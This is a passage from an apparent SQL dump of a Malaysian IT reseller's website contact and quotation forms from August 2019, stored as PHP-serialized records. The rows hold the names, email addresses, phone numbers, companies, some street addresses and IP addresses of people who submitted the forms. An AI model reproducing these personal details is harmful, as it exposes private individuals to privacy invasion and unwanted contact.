Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"03-77334593\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Epsilon Management Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:65:\"Unit 1-2, Menara Oval Damansara, Jalan Damansara, TTDI, 60000, KL\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"11\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-15 10:12:16','118.100.2.36','1'),(272,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"takim lawar\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"takimlawar@Email.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"1137651690\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"takim lawar\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"bukan orang kaya\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-18 08:37:33','82.145.208.82','1'),(273,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"MOHD FAIROZ BIN MAT JUSOF\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"fairozquetta@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0126233719\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"MALAYSIAN ARMY\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"32A, JALAN BAYU 2, DESA SRI BAYU\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 33\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"77\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-18 17:37:37','183.171.72.38','1'),(274,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"ANIS BINTI ISMAIL\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"anismail767@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"03 90769624\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"GRAND TEKNIK BINA SDN. BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:67:\"NO 29, JALAN SUARASA 8/3, BANDAR TUN HUSSEIN ONN, CHERAS , SELANGOR\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:130:\"Hi, I am from Grand Teknik Bina, would like to request for a quotation for Video Conference System Logitech 960-001054. Thank you.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"07\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-19 09:17:55','219.92.234.243','1'),(275,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Penny Ang\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"penny@resdaq.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"012-4759661\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"RESDAQ TECHNOLOGY SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:119:\"Hi, we are the reseller. Please quote the below your best price and state the delivery lead time:- POWER PDF 3 ADVANCED\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"88\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-21 11:19:58','61.4.110.226','1'),(276,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"LIM YEE LEE\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"yeelee.lim@connellworld.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0125197122\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"Connell Bros. Company (Malaysia) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:37:\"Logitech MeetUp, MeetUp Expansion Mic\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-21 16:13:42','219.92.48.217','1'),(277,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"FATIN NABILA\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"admin@nasquest.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0321614611\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"NasQuest Resources Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:136:\"RFQ: Logitech Group Meeting Conference - Â· Logitech Group Expan. Microphone Â· Group extender cable Â· Inclusive of 2 x HDMI cable (5m)\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"24\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-21 16:40:54','175.136.213.99','1'),(278,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Lovelyn Joseph\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"jlmedia007@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"017 8677675\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"J.L. Media\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"REQUEST FOR QUOTATION\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"20\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-22 10:19:59','175.144.122.33','1'),(279,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Azuha Zulkifli Amin\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"azuha.amin@denave.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number 